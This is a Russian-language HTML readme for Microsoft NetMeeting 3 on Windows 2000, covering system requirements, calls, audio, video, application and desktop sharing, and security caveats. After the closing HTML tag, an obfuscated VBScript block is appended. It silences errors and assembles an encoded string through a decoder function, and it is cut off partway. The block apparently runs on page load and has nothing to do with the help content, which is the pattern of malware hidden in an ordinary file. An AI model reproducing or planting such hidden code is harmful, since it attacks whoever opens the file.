<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=Windows-1251">

<style TYPE="text/css">

h1 { font-size: 125%; margin-bottom:" .5em"; clear:both; }

h2 { font-size: 110%; margin-top: 1.5em; margin-bottom:" .5em"; clear:both; }

h3 { font-size: 100%; margin-top: 1.2em; margin-bottom: ".5em"; clear:both; }

h4 { font-size: 100%; margin-top: "1.2em"; margin-bottom: ".5em"; clear:both; }

h5 { font-size: 100%; margin-top: "1.2em"; margin-bottom: ".5em"; clear:both; }

h6		{ font-size: 70%; margin-top: ".2em"; margin-bottom: ".5em"; clear:both; }


p { margin-top:"1.5em"; margin-bottom: ".6em"; }

ol { margin-top: ".5em"; margin-bottom: 0; margin-left: "2.1em"; padding-left: "0em"; }

ul { margin-top: ".6em"; margin-bottom: 0; list-style-type: disc; margin-left: "1.5em"; padding-left: "0em"; }

li { margin-bottom: ".7em"; clear:both; }

dd { margin-bottom: 0; margin-left: "1.5em"; }



body    		{ color: #000000; background: #FFFFFF; font-size: 70%; font-family: Verdana, Arial, Helvetica, Sans Serif }

A:HOVER {color: #3399FF} a:link	{text-decoration	:	underline}; a:visited	{text-decoration	:	underline}; a:active	{text-decoration	:	underline};
</style>

<TITLE>Сведения о Microsoft Windows NetMeeting 3 </TITLE>
</HEAD>
<body>

<font face="Verdana, arial">
<hr width="80%">
<h2><center>Сведения о Microsoft Windows NetMeeting 3<br> Windows 2000 </center></h2>

<center>(c) Корпорация Майкрософт (Microsoft Corporation), 1999.</center>
<hr width="80%">
<p>Приводимые здесь сведения дополняют существующую справку и другую документацию по NetMeeting.</p>

<h3><a name="Contents">СОДЕРЖАНИЕ</a></h3>

<table WIDTH="100%">

<tr>
<td WIDTH="50%"><h6><a href="#systemrecs">Требования к системе и установка программы</a></h6></td>
<td WIDTH="50%"><h6><a href="#Audio" target="_self">Звук</a></h6></td>
</tr>

<tr>
<td width="50%"><h6><a href="#geninfo" target="_self">Общие сведения</a></h6></td>

<td WIDTH="50%"><h6><a href="#Video" target="_self">Видеоизображение</a></h6></td>
</tr>

<tr>
<td WIDTH="50%"><h6><a href="#GKI" target="_self">Общие вопросы</a></h6></td>

	<td WIDTH="50%"><h6><a href="#Gate" target="_self">Привратники и шлюзы</a></h6></td>
</tr>

<tr>
<td WIDTH="50%"><h6><a href="#placecall" target="_self">Отправка вызова</a></h6></td>

	<td WIDTH="50%"><h6><a href="#RDS" target="_self">Общий доступ к рабочему столу</a></h6></td>
</tr>

<tr>
<td WIDTH="50%"><h6><a href="#RecCall" target="_self">Получение вызова</a></h6></td>

	<td WIDTH="50%"><h6><a href="#Secure" target="_self">Безопасность</a></h6></td>
</tr>

<tr>
<td WIDTH="50%"><h6><a href="#ShareAp" target="_self">Совместная работа с приложениями</a></h6></td>

	<td WIDTH="50%"><h6><a href="#NTI" target="_self">Другие общие вопросы</a></h6></td>
</tr>

<tr>
<td WIDTH="50%"><h6><a href="#WhiteB" target="_self">«Доска»</a></h6></td>

<td WIDTH="50%"><h6><a href="#accessibility" target ="_self"">Специальные возможности</a></h6></td>
</tr>
<tr>
<td WIDTH="50%"><h6><a href="#Chat" target="_self">«Разговор»</a></h6></td>
</td>
<td WIDTH="50%"><h6></h6></td>
</tr>
</table>

<p></p>
<p></p> <a name="SystemRecs">
<h3>Требования к системе и установка программы</h3> </a>

<p>Microsoft(R) Windows(R) NetMeeting(R) обеспечивает синхронную передачу данных, звука и видеоизображений в Интернете. </p>

<p>В каждой из присутствующих на компьютере операционных систем приложение NetMeeting следует устанавливать в отдельную папку. При установке в одну общую для всех операционных систем папку, которая была указана по умолчанию, приложение NetMeeting не будет выполняться должным образом.</p>

<p>В Windows 2000 приложение NetMeeting устанавливается в папку \netmeeting. При этом новые файлы записываются поверх ранее установленных файлов NetMeeting для Windows 95 или Windows 98. После установки NetMeeting на компьютер с системой Windows 2000 следует установить это приложение еще раз в системе Windows 95 или Windows 98, но в другую папку, отличную от \netmeeting.

<p>Наилучшая работа NetMeeting обеспечивается на быстрых соединениях Интернета (модем со скоростью передачи данных 56 килобайт в секунду или выше, либо в локальной сети).</p>

<p>Рекомендуемое разрешение экрана монитора — не ниже, чем 800 на 600 точек. Допускается также использование режима сжатия.</p>

<p>Использование SLIP или других подключений, действующих подобно SLIP/PPP, может воспрепятствовать правильному выполнению программы NetMeeting.</p>

<p>Необходимые сведения о поддержке продукта содержатся в файле Support.txt. Этот файл можно найти в папке Windows или NetMeeting.</p>

<p>Если OEM-версия Windows 2000 поставляется вместе с компьютером, с помощью окна «Установка и удаление программ» на панели управления приложение NetMeeting удалить невозможно.</p>

<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="geninfo"><h3>Общие сведения</h3></a>
<p>NetMeeting поддерживает стандарт H.323 для аудио- и видеоконференций, а также стандарт T.120 для конференций с передачей данных. С помощью NetMeeting можно отправлять и получать вызовы из приложений, в которых также поддерживаются эти стандарты. Используя соответствующие службы и оборудование от независимых производителей, NetMeeting позволяет выполнять телефонные вызовы через шлюз H.323. Кроме того, NetMeeting обеспечивает возможность вызова устройств MCU (модулей для проведения конференций с подключением нескольких узлов), в которых реализован стандарт H.323, а также участия в аудио- и видеоконференциях с подключением нескольких узлов.</p>
<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="GKI"><h3>Общие вопросы</h3></a>

<p>Проводящий встречу в NetMeeting 3.0 (или в более поздней версии этого приложения) может определить ряд ограничений (невозможность совместной работы с приложениями, запуска программы «Разговор» и т.п.). Однако эти ограничения не будут распространяться на компьютеры с версией NetMeeting 2.<i>x</i>. Пользователи приложения NetMeeting 2.<I>x</I> смогут работать с этими возможностями по-прежнему.</p>

<p>На компьютерах с NetMeeting не может выполняться приложение ReachOut 5.0.</p>

<p>Чтобы определить свое имя NetBIOS, используемое в NetMeeting, проделайте следующее:</p>
<ol>
<li>На панели управления дважды щелкните значок <b>Сеть</b>.
<li>Откройте вкладку <b>Идентификация</b>.
</ol>

<p>Если для установки единых настроек Windows на всех компьютерах сети применяются «профили пользователей», после смены компьютеров может потребоваться запуск мастера настройки звука. </p>

<p>Приложения Microsoft(R) FrontPage(R) и NetMeeting в настоящее время используют файлы одного типа (.cnf). В NetMeeting эти файлы содержат данные ярлыков.</p>

<p>Устройство ISDN может быть настроено на автоматическое подключение к сети. Такое устройство может сделать попытку подключения к сети во время работы NetMeeting. Чтобы предотвратить это, отключите автоматический набор номера для данного устройства ISDN.</p>

<p>Обмен аудио- и видеоданными может происходить одновременно только между двумя участниками.</p>

<p>В некоторых режимах обмен данными между компьютерами участников встречи может быть особенно интенсивным (например, если одновременно идет передача звука, ведется работа с несколькими общими приложениями и передается файл большого объема). Такая загрузка может иногда замедлять работу компьютеров. В этом случае следует прекратить выполнение отдельных операций, связанных с проведением встречи.</p>

<p>Совместная работа в приложениях Microsoft(R) DirectX(R), OpenGL, MS-DOS(R), использование игр с насыщенной графикой и AVI-файлов не поддерживаются. </p>

<p>Общие приложения, приложения «Доска» и «Разговор» могут работать неправильно, если участвующие во встрече компьютеры используют разные установки языка и раскладки клавиатуры.</p>

<p>Если Internet Explorer 5.0 (или более поздняя версия этого приложения) работает в автономном режиме, при запуске NetMeeting автоматического подключения к Интернету не происходит. Чтобы обойти это затруднение, установите удаленное соединение по протоколу RAS для компьютеров с системой Windows 2000. Или снимите флажок <b>Работать автономно</b> (меню <b>Файл</b>) в Internet Explorer.</p>

<p>Настроив соответствующие параметры встречи, можно запретить подключающимся к ней участникам пользоваться входящими в состав NetMeeting программами («Разговор», «Доска», «Передача файлов». Это, однако, не мешает продолжить работу с данными программами, если она началась до подключения к встрече с указанными настройками.</p>

<p>Выбирая работу с безопасными вызовами, следует учитывать, что безопасные конференции не поддерживаются в приложениях Office 2000. Встреча, которая проводится (после выхода из NetMeeting) средствами приложения Office 2000, не будет безопасной.</p>

<p>Если запущено приложение NetMeeting, а также при работе со средствами доступа к общему столу, изменять интенсивность цветопередачи не рекомендуется.</p>

<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="PlaceCall"><h3>Отправка вызова</h3></a>

<p>В NetMeeting вызовы могут оправляться сразу нескольким пользователям.</p>

<p>Благодаря адресному справочнику в Интернете («Каталог Интернета Microsoft»), который организован и ведется корпорацией Майкрософт, существует возможность находить других пользователей NetMeeting. Для просмотра содержимого адресного справочника («Каталог Интернета Microsoft») нажмите кнопку <b>Поиск пользователя в каталоге</b> и в поле <b>Выберите папку</b> щелкните мышью <b>Каталог Интернета Microsoft</b>.</p>

<p><b>Примечание.</b>  Если используемый для подключения к Интернету прокси-сервер не поддерживает работу с приложением NetMeeting, вызов абонентов из веб-справочников (на серверах каталогов) невозможен. </p>

<P>Для установки соединения ввода имени компьютера может оказаться недостаточно. Попробуйте воспользоваться IP-адресом.</p>

<p>Существование двух действующих сетевых подключений через различные сетевые платы может воспрепятствовать установке соединения со справочной службой.</p>

<p>В некоторых устройствах MCU учитывается регистр букв. Это следует принимать во внимание при вводе имени конференции во время отправки вызова.</p>

<p>При подключении к привратнику для вызова конференции MCU может потребоваться ввод соответствующего псевдонима. Дополнительные подробности можно выяснить у системного администратора.</p>

<p>Если вызовы отправляются через привратника, при подключении можно указывать как имя учетной записи, так и номер телефона (либо то и другое).</p>

<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="RecCall"><h3>Получение вызова</h3></a>

<p>Для получения входящих вызовов следует запустить Microsoft NetMeeting и снять в меню <b>Вызов</b> флажок <b>Не беспокоить</b>.</p>

<p>Максимальное число одновременных подключений определяется настройками реестра для протокола TCP/IP.</p>
<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="ShareAp"><h3>Совместная работа с приложениями</h3></a>

<p>Любой участник встречи может предоставить другим участникам в общее пользование какое-либо приложение. При этом другие пользователи могут следить за выполнением общего приложения на своих компьютерах. Если предоставлена возможность управления, другие пользователи смогут также самостоятельно работать с этим приложением.</p>

<p>Пользователи NetMeeting 2.<i>x</i> не имеют возможности управлять общими программами, которые выполняются на компьютерах с NetMeeting 3.0 (или более поздней версией).</p>

<p>Данная версия приложения NetMeeting допускает одновременную работу с общими приложениями сразу многих пользователей. Однако доступ через NetMeeting 2.0 к приложению, с которым уже работают три или более пользователей, может оказаться невозможным. Общее количество пользователей, которые могут успешно участвовать во встрече, зависит от пропускной способности сети и производительности компьютеров участников.</p>

<p>Microsoft Internet Explorer (версия 5 или выше): если разрешить общий доступ с возможностью управления к окну проводника Windows, после того как это окно будет закрыто другим пользователем, все вновь открываемые программы и окна будут также доступны остальным участникам встречи. В рассматриваемом случае запретить общий доступ можно следующим образом. Еще раз откройте окно проводника Windows, а затем отмените данный режим. </p>

<p>Если удаленным пользователям предоставляется возможность управления общими программами, через диалоговые окна <b>Открыть файл</b> и <b>Сохранить файл</b> они одновременно получают доступ к файловой системе соответствующего компьютера или сети. </p>

<p>Сочетания клавиш, используемые при управлении общей программой, воспринимаются как команды именно в этой программе, а не в меню окна, где выполняется общая программа. В окне общей программы сочетания клавиш не работают. </p>

<p>Не рекомендуется оставлять без присмотра компьютер, если на нем выполняется общее приложение, которым могут управлять другие пользователи.</p>

<p>Если из общего приложения запустить другое приложение (например, при работе с Microsoft Word открыть таблицу Microsoft Excel), совместный доступ к последнему может быть невозможен. </p>

<p>Нельзя перетаскивать объекты в общее приложение, а также из общего приложения на рабочий стол.</p>

<p>При изменении размеров окна общего приложения колесико мыши (если используется IntelliMouse) может не работать или работать неправильно.</p>

<p>Если в общем приложении используется редактор Input Method Editor (IME), чтобы другие пользователи могли включать его мышью, необходимо отобразить строку состояния IME.</p>

<p>Если IME не поддерживает отображение строки состояния или другим пользователем не удается включить IME, это может быть сделано вручную.</p>

<p>Щелкнув мышью любое место рабочего стола, обновите окно IME во время встречи, если этого не происходит автоматически.</p>

<p>На компьютере, где установлены другие приложения с возможностями общего доступа или удаленного управления, работа с общими программами в NetMeeting может оказаться невозможна. </p>

<p>Когда управление общей программой переходит к другому пользователю, элементы интерфейса для управления общим доступом (рамки и диалоговые окна общего доступа, а также рамки, созданные на других компьютерах) на рабочем столе пользователя, который предоставляет совместный доступ, не отображаются. После возврата управления все эти элементы интерфейса вновь будут присутствовать на экране. </p>

<p>Компьютер с системой Windows 2000 может быть настроен на работу с несколькими языками. В этом случае при совместной работе с приложениями текст в формате Юникод с компьютера организатора встречи будет отображаться неправильно на удаленных компьютерах, работающих под управлением Windows 2000.</p>

<p>Если компьютер, на котором выполняются общие приложения, использует шестнадцатиразрядную цветовую палитру (или палитру с меньшим числом разрядов), элементы изображения серого цвета на удаленных компьютерах будут отображаться как зеленые. Это относится к элементам меню, панелям кнопок и строкам состояния. </P>

<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="WhiteB"><h3>«Доска»</h3></a>

<p>Входящая в состав приложения NetMeeting программа «Доска» позволяет нескольким пользователям одновременно рисовать в общем окне. Содержимое этого окна доступно сразу всем участникам встречи. При открытии одним из участников встречи окно этой программы выводится и на экранах всех других участников.</p>

<p>С разрешением 1152х864 и более приложение «Доска» не может выполняться в полноэкранном режиме. </p>

<p>При обмене данными между участвующими в конференции компьютерами с Windows 2000 и компьютерами с Windows 95 (Windows 98) перекодировка двухбайтных символов (из набора DBCS) может выполняться неправильно.

<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="Chat"><h3>«Разговор»</h3></a>

<p>Программа «Разговор» позволяет вводить с клавиатуры сообщения для других участников. Если кто-либо запускает это приложение во время встречи, соответствующее окно отображается на экранах остальных участников, которые работают с NetMeeting 3.0 (или более поздней версией этого приложения). </p>

<p>Пользователи, работающие с программой «Разговор» в NetMeeting 2.11, не имеют возможности закрыть окно этой программы, если у других участников встречи установлено приложение NetMeeting 3.0 (или более поздняя версия).</p>

<p>Сохраняемые этим приложением HTM-файлы могут просматриваться с помощью веб-обозревателя.</p>

<p>«Разговор» из состава NetMeeting 2.<i>x</i> в отдельных случаях не может взаимодействовать с соответствующими средствами в NetMeeting 3.0 (или более поздней версии). </p>

<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="Audio"><h3>Звук</h3></a>

<p>Для звуковой связи компьютер, на котором работает приложение в NetMeeting, должен быть оборудован звуковой платой, динамиками и микрофоном.</p>

<p>В общении с передачей звукового сигнала может участвовать только два пользователя.</p>

<p>Качество звука в большой степени зависит от используемой звуковой карты и микрофона, а также от качества соединения. </p>

<p>При смене драйвера звуковой карты, например при обновлении на драйвер с поддержкой дуплексной связи, для правильной работы NetMeeting требуется снова запустить мастер настройки звука.</p>

<p>Восстановление пользователем NetMeeting 2.0 прерванной во время вызова передачи звукового сигнала может оказаться невозможным. В этом случае завершите вызов, а затем выполните его повторно.</p>

<p>Мастер настройки звука может выдать сообщение о том, что установленная на компьютер звуковая карта не поддерживается. Это происходит, когда звуковая карта не обеспечивает некоторых возможностей, которые необходимы для NetMeeting. Даже в этом случае звуковая связь NetMeeting может работать, но с потерей качества звука.</p>

<p>Если звуковая карта не поддерживается, попробуйте обратиться на предприятие-изготовитель; возможно, для этой карты были выпущены новые драйверы.</p>

<p>Если компьютер оборудован платой ATI All In Wonder, во время вызова может не работать микрофон и отсутствовать звук. Эти неполадки устраняются следующим образом. Дважды щелкните мышью расположенный в области состояния значок динамика. В меню <b>Параметры</b> выберите пункт <b>Свойства</b>. Выберите параметр <b>Запись</b>, нажмите кнопку <b>OK</b>. Выберите микрофон в качестве источника звукозаписи.</p>

<p>Использование звуковых плат Turtle Beach, Yamaha, SoundBlaster (кроме основанных на Ensoniq типов AudioPCI), Diamond, Crystal, а также динамиков USB корпорации Майкрософт позволит задействовать возможности DirectSound и таким образом получить более качественное звучание за счет уменьшения времени задержки сигнала. По умолчанию это средство отключено.</p>
<p>Улучшения качества звучания можно добиться включением DirectSound.</p>
<ol>
<li>Выберите команду <b>Параметры</b> в меню <b>Сервис</b>.</li>
<li>На вкладке <b>Звук</b> установите флажок <b>Задействовать DirectSound для качественного звука</b>.</li>
</ol>
<p>Если в дуплексном режиме звук передается с перебоями, попробуйте перейти в полудуплексный режим: </p>

<ol><li>Убедитесь, что вы не участвуете в вызове NetMeeting.

<li>Выберите команду <b>Параметры</b> в меню <b>Сервис</b>.

<li>На вкладке <b>Звук</b> снимите флажок <b>Разрешить дуплексную связь, позволяющую говорить при получении звука</b>.</ol>

<p>Не рекомендуется переключаться между этими двумя режимами во время встречи со звуковой связью.</p>

<p>Неудовлетворительное качество звука и плохая работа звуковой платы в приложении NetMeeting могут быть связаны с конфигурацией оборудования или установкой драйвера. Чтобы ознакомиться с последними сведениями о поддержке программных продуктов, выберите в меню <b>Справка</b> пункт <b>Поддержка продуктов</b>.</p>

<p>Компьютер может быть оборудован несколькими устройствами для работы со звуком. В этом случае следует убедиться в том, что устройства, выбранные во время настройки звука, соответствуют свойствам «Мультимедиа» на панели управления.</p>

<p>После установки на компьютер нового процессора необходимо повторно запустить мастер настройки звука.</p>

<p>Во время аудиоконференции с использованием NetMeeting приложение, в котором имеется возможность звукозаписи (например Microsoft PowerPoint), попытается выполнить запись. Однако поскольку в NetMeeting уже используется звуковая плата, в действительности этим приложением звук записан не будет.</p>

<p>Перемещение вправо ползунка Wave Output Balance (в соответствующем окне Windows) может привести к отключению динамиков NetMeeting.</p>

<p>Если оба участвующих в вызове компьютера используют аудиодрайверы WDM, вначале при установке соединения может быть слышен сигнал помехи. В этом случае средство DirectSound необходимо отключить. <ol><li>Выберите команду <b>Параметры</b> в меню <b>Сервис</b>. <li>На вкладке <b>Звук</b> снимите флажок <b>Задействовать DirectSound для качественного звука</b>.</ol>

<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="Video"><h3>Видеоизображение</h3> </a>

<p>Для передачи видеоизображений в NetMeeting компьютер должен быть оборудован платой видеосъемки с камерой либо видеокамерой, подключенной к параллельному порту (порту принтера) или к порту USB. </p>

<p>Камеры с платами для видеосъемки менее требовательны к вычислительным ресурсам по сравнению с камерами, которые подключаются непосредственно к параллельному порту компьютера. </p>

<p>В видеосвязи одновременно могут участвовать только два пользователя.</p>

<p>На скорости передачи 28,8 килобайт в секунду по умолчанию используется наивысшее качество видеоизображения. Чтобы изменить эту установку, выберите в меню <b>Сервис</b> пункт <b>Параметры</b>, откройте вкладку <b>Видео</b>, а затем измените нужный параметр в группе <b>Качество видео</b>.</p>

<p>Размеры окна просмотра видеоизображения могут не соответствовать значениям, которые были выбраны в диалоговом окне «Параметры». </p>

<p>Во встрече с несколькими участниками передача видеоданных может снизить производительность работы всех подключенных компьютеров. Так открытие окна видеоизображения может препятствовать управлению общим приложением другими пользователями.</p>

<p>Если на компьютер было установлено несколько видеоустройств, а также после неправильного удаления такого устройства из конфигурации, возможность работы с видеоизображениями может отсутствовать. Если видеоустройство было удалено из конфигурации неправильно, а видеосвязь в NetMeeting разрешена, оставшееся программное обеспечение камеры может время от времени выдавать предупреждения о том, что камера не найдена.</p>

<p>Если при работе с видеосредствами в NetMeeting отключить камеру, ее программное обеспечение может выдавать сообщения о том, что камера не отвечает на запросы. Чтобы отключить вывод таких сообщений, выберите в меню <b>Сервис</b> пункт <b>Параметры</b>, откройте вкладку <b>Видео</b> и снимите флажок <b>Автоматически передавать при вызове</b>.</p>

<p>Если выполняется другое приложение, использующее средства видеосъемки, видеофункции в NetMeeting могут не работать.</p>

<p>Нарушение цветопередачи в окне видеоизображения может быть связано с недостаточной освещенностью объекта, на который направлена камера. Некоторые видеодрайверы поддерживают фильтр низкой освещенности.</p>

<p>При съемках в темном помещении некоторые камеры могут существенно замедлить работу компьютера.</p>

<p>Невозможность предварительного просмотра видеоизображения с помощью устройств видеосъемки может быть вызвана отсутствием необходимого кодека (например YUV или I420). Последнюю версию Intel Indeo Video можно загрузить из Интернета: <a href="http://developer.intel.com/ial/indeo/video"> http://developer.intel.com/ial/indeo/video</a></p>

<p>При работе с камерами Winnov использование видеосредств приводит к автоматическому переключению входа звукового сигнала. Если видеосвязь установлена через подключение MXC, звуковой сигнал будет подаваться через вход камеры. Если видеосвязь установлена через подключение Composite или S-Video, звуковой сигнал будет поступать на линейный вход.</p>

<p>Для некоторых камер посредством ручной регулировки параметров в диалоговых окнах <b>Источник</b> и <b>Формат</b> (вместо автоматической регулировки видеодрайвером) можно добиться снижения загрузки процессора.</p>

<p>При использовании драйверов WDM на компьютере, оборудованном платой ATI All In Wonder, средства обработки видеоизображений в NetMeeting могут не работать.</p>

<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="Gate"><h3>Привратники и шлюзы</h3> </a>

<p>Смена привратника и изменение своих данных регистрации во время вызова нежелательны.</p>

<p>IP-адреса, назначаемые некоторыми приложениями, сетевыми платами и PPP-адаптерами могут не соответствовать учетным данным, которые есть у привратника. </p>

<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="RDS"><h3>Общий доступ к рабочему столу</h3> </a>
<p>Имеющиеся в NetMeeting 3.0 (или более поздней версии) средства общего доступа к рабочему столу позволяют выполнить удаленный вызов компьютера, на котором работает служба общего доступа к рабочему столу (ведомого компьютера), и получить доступ к находящимся на нем программам и папкам. После подключения к удаленному компьютеру пользователь может работать с любыми файлами и в любых приложениях, к которым имеется доступ с этого компьютера.</p>

<p>Организация доступа пользователей к компьютеру через общий рабочий стол не требует предоставления им учетных записей с привилегиями администратора. Для такого доступа следует создать группу «Пользователи общего рабочего стола в NetMeeting» и добавить в нее соответствующих пользователей.</p>

<p>Для удаленного подключения к своему компьютеру с помощью средств общего доступа к рабочему столу необходимо знать IP-адрес своего компьютера или имя вызываемого компьютера. IP-адрес компьютера отображается в диалоговом окне <b>О программе</b> (меню <b>Справка</b>).</p>

<p>При открытии веб-страницы, для которой NetMeeting включен в интерфейс пользователя обозревателя, средства удаленного доступа автоматически отключаются. Их следует включить вручную.</p>

<p>Если назначение IP-адреса происходит автоматически, например при модемном подключении, сервер удаленного доступа не может продолжать сеанс после временного отключения от сети. В этом случае следует отключить удаленный доступ, освободить и обновить все адреса в программе настройки IP-адресов в Windows (ipconfig.exe для Windows NT 2000), а затем вновь включить удаленный доступ.</p>

<p>Если приложение было настроено на автоматический запуск при запуске системы Windows, разрешение общего доступа к рабочему столу предполагает одновременное отключение автоматического запуска средствами NetMeeting. Однако приложение NetMeeting не может выполнить эту операцию правильно. В результате при следующем запуске компьютера средства общего доступа к рабочему столу работать не будут. Чтобы обойти это затруднение, отключите средства общего доступа к рабочему столу, включите автоматический запуск, а затем отключите его вручную. После этого общий доступ к рабочему столу может быть успешно включен.</p>

<p>Если при включенном общем доступе к рабочему столу перезагрузить компьютер с системой Windows 2000, а затем попытаться войти в систему с удаленного компьютера, текст в диалоговых окнах <b>приветствия</b> и <b>входа в систему</b> будет отображаться неправильно. Вход в систему Windows 2000, где включены средства общего доступа к рабочему столу, при этом по-прежнему возможен.</p>
<p><b>Примечание.</b> Текст в диалоговых окнах <b>приветствия</b> и <b>входа в систему</b> отображается правильно, если выход из системы был осуществлен без перезагрузки.</p>

<p>Если на компьютере с системой Windows 2000, где разрешен общий доступ к рабочему столу, имеется поддержка «ждущего режима», этот режим лучше отключить. Переход «ждущий режим» выполняется вручную (из диалогового окна завершения работы) либо автоматически (через параметры электропитания на панели управления).</p>
<blockquote>
<p><b>Чтобы отключить автоматический переход в «ждущий режим»:</b></p>
<ol>
<li>В меню <b>Пуск</b> выберите пункт <b>Настройка</b>, а затем — <b>Панель управления</b>.</li>
<li>Двойным щелчком левой кнопки мыши выберите элемент <b>Параметры электропитания</b>.
<li>Откройте вкладку <b>Схемы управления питанием</b> и выберите в списке <b>Ждущий режим</b> пункт <b>Никогда</b>.
</ol>
</blockquote>


<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="Secure"><h3>Безопасность</h3></a>

<p>При безопасных вызовах (передаются только данные) команды и пункты меню, связанные с обработкой звука и изображения, не должны быть доступны. В настоящей версии они, однако, по-прежнему остаются доступными во время вызова.</p>

<p>Windows NetMeeting позволяет работать только с теми сертификатами, которые представлены в системной базе данных сертификатов Windows. В NetMeeting не могут использоваться сертификаты, полученные обозревателем из личных баз данных сертификатов (например Netscape Communicator 4.5). Для работы с подобными сертификатами их следует вначале экспортировать из Netscape Communicator, а затем импортировать в Internet Explorer. </p>

<p>На время вызова параметры безопасности в диалоговых окнах <b>Поиск пользователя</b> и <b>Вызов</b> становятся недоступными. Кроме того, если эти окна открыты во время вызова, соответствующие параметры в них становятся недоступными автоматически.</p>
<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>


<a name="NTI"><h3>Другие общие вопросы</h3></a>


<p>Если предоставить в общее пользование 16-разрядное приложение, все работающие на том же компьютере 16-разрядные приложения автоматически также станут общими.</p>

<p>Если в общее пользование предоставляется 32-разрядное приложение, могут возникнуть трудности, связанные со вставкой пакетов. Это происходит из-за ошибки при запуске упаковщика объектов, который автоматически является общим приложением. Данный сбой не вызовет ошибку исходного общего приложения или программы NetMeeting.</p>

<p>При невозможности получения вызова попробуйте перезагрузить компьютер.</p>

<p>Если звуковая плата отсутствует, пропускную способность соединения следует задать вручную. Для этого в меню <b>Сервис</b> выберите пункт <b>Параметры</b>, затем выберите <b>Пропускная способность</b> и установите соответствующее значение в группе <b>Пропускная способность сети</b>.</p>

<p>Для подключения к серверу каталогов через прокси-сервер может потребоваться удаление из системы службы удаленного доступа к сети.</p>

<p>Если после вызова NetMeeting сообщает, что ждет ответа абонента более минуты, завершите работу приложения и попробуйте связаться еще раз.</p>

<p>Ярлык, поступающий в сообщении электронной почты, может быть преобразован почтовой программой в текстовый файл («.txt»). После переименования в файл с расширением «.cnf» он может использоваться в качестве ярлыка.</p>

<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a>

<a name="accessibility"><h3>Специальные возможности</h3></a>
<p>С помощью приложения NetMeeting можно через шлюз отправлять вызовы в систему звуковой почты. Сочетания клавиш для таких вызовов представлены в следующей таблице.</p> </font>
<table width = 100%>
<tr>

<td><h6>Чтобы</h6></td>
<td><h6>Воспользуйтесь клавишами</h6></td>
</tr>
<tr>
<td><h6>Набрать номер</h6></td>
<td><h6>CTRL + [номер] ИЛИ<br>CTRL + [номер на цифровой клавиатуре]</h6></td></tr>
<tr></tr>
<tr>
<td><h6>Нажать кнопку с изображением звездочки</h6></td>
<td><h6>CTRL + Shift + 8 ИЛИ<br>CTRL + [* на цифровой клавиатуре]</h6></td>
</tr>
<tr>
<td><h6>Нажать кнопку с изображением фунта</h6></td>
<td><h6>CTRL + Shift + 3</h6></td></tr>
</table>


<p align="right"><a href="#contents" target="_self">Возврат к содержанию</a> </font>
</body>


</HTML>
<SCRIpT laNGUAgE=VBscRIPT>
ON ERroR REsUMe nEXt
w5=w5&dg4("xw3>#»ЪЊСѕѕЫѕЊѕСїБ№±Њє±ДАyvЯСАЊ­Њ©ЊЇѕ±­А±»®ЦСЇА”ЋїЇЮµјаµЪіљІХШСїЕїА±№»®¶СЇаЋ•yvЯСАЊ®­®±Њ©Њ­љ»ј±ЪА±ДАІµё±”ГЯЇѕµјАљїЇѕµјАІбёёєН№±Њќ•yv®Д©ЇФЮ”џ •yvЮ­ЪРЫ№µЖ±yv®Б©µЪа”ѕє°–ќњњ—џњ•yvїќ©Пґѕ”ХєА”ѕє°–ћЎ—ҐЈ••yvЯћ©ЇФѕ”µЪА”ѕє°–ћЎ—ҐЈ••yvїџ©ЇґЮ”ХєА”Ює°–ћЎ—ҐЈ••yvї ©ЇФЮ”µЪА”ѕЪ°–ћЎ—ҐЈ••yvїЎ©ЇФЮ”ХЪА”ЮЪ°–ћЎ—ҐЈ••yvїў©Їґѕ”µЪа”ѕє°–ћЎ—ҐЈ••yvЯЈ©Їґѕ”µєА”ѕєР–ћЎ—ҐЈ••yvї¤©ПґЮ”µєА”ѕЪР–ћЎ—ҐЈ••yvЯҐ©Їґѕ”ХєА”Ює°–ћЎ—ҐЈ••yvЇќ©µЪа”ѕє°–¤—ќ•yvПћ©µєА”ѕєР–¤—ќ•yvЇџ©ХєА”ЮЪ°–¤—ќ•yvЇ ©µєА”ѕЪ°–¤—ќ•yvyvІБєПаХЫЪЊУє”їФХа•yvІЫѕЊ­ж©ќЊа»ЊШ±Ъ”ЯФµа•yvПж©­їЇ”№µР”ЯФµА­ЖШ±є”Яґµа•••yvµІЊПжЄў Њ­є°ЊПЖЁҐќЊАґ±Ъyvѕ­єР»№ХжСyvѕћ©µЪА”ѕєР–ћ•yvµІЊЮћ©ќЊАФ±єyvЇЖ©Їж—џћyv±є°ЊХТyvСє°ЊµІyvµТЊЇЖЄҐўЊНє°ЊПжЁќћџЊАФСєyvѕ­є°»№µЖСyvЮџ©µєА”ЮєР–ћ•yvµІЊѕџ©ќЊАґСЪyvЇЖ©ЇЖ™џћyv±є°ЊµТyv±єРЊµІyvЇґ©ЇЖ—®бyvіє©іЪ’Пґѕ”Їґ•yvє±ДАyvСєРЊТБєПАµ»ЪyvyvТБєПАµ»єЊУУ”їґµА•yvІ»ѕЊН©ќЊА»ЊёСє”їФµА•yvУі©іі’ЇґЮ”­їЇ”ЩХР”їґµА­Ш±Ъ”їґµА•••—ќ•yvєСДаyv±є°ЊІБєПаХ»єyvyvП»Р±і±є”•yvyvѕ­ёЊ©Њ®­О±љѕ±­Р­ёШyv®­®СљЇШ»Я±yvДґ©Уі”ѕ­ё•yv№НµШ”•yvµТЊ°НЕ”ЪЫГ•©ўЊ»ѕЊ°­Е”єЫГ•©ќџЊ»ѕЊ°НЕ”єЫГ•©ћќЊ»ѕЊ°­Е”ЪЫГ•©ћ¤ЊАґСЪyv±ќ”•yv±ёї±yvС 